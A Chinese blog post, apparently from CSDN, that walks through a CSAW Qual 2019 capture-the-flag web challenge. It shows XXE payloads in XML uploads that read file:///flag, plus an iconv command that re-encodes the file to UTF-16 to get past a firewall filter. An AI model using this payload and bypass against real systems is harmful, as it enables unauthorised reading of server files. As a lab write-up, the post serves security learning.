[CSAWQual 2019]Web_Unagi ---不会编程的崽

本文讲述了作者在探索一个Web应用中的XXE漏洞过程中,涉及上传XML文件、利用实体引用注入payload,以及如何通过编码转换(如UTF-16)绕过防火墙限制的经历。
摘要由CSDN通过智能技术生成

不知道刷了多少天了,又是一题关于xxe漏洞的。

web的习惯性操作。

1.功能点&cms

2.源代码

3.敏感文件泄露

当然这是我个人的习惯。这里进入界面后又upload功能,不会是传马吧。但是旁边给了上传文件格式。仅仅只看界面似乎没什么区别,源代码,启动!!!

很明显,xml的格式。猜测这里需要上传xml文件,漏洞属于xxe。最右边给出了提示flag在根目录下边。

<users>
    <user>
        <username>111</username>
        <password>111</password>
        <name>111</name>
        <email>111</email>  
        <group>1111</group>
    </user>
</users>

 上传成功,有回显。

<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///flag" >
]>
<users>
    <user>
        <username>&xxe;</username>
        <password>&xxe;</password>
        <name>&xxe;</name>
        <email>&xxe;</email>  
        <group>&xxe;</group>
        <intro>&xxe;</intro>
    </user>
</users>

 构造payload,又给提示,被防火墙拦截了。。。

怎么绕过呢?转换编码即可,utf16

cat 1.xml | iconv -f utf8 -t utf-16 1.xml>2.xml

 iconv是liunx转编码的命令

emmmm,怎么还有长度限制,不过看了一下user界面,还有个标签intro

<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///flag" >
]>
<users>
    <user>
        <username>&xxe;</username>
        <password>&xxe;</password>
        <name>&xxe;</name>
        <email>&xxe;</email>  
        <group>&xxe;</group>
        <intro>&xxe;</intro>
    </user>
</users>

记得自己转码哦

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值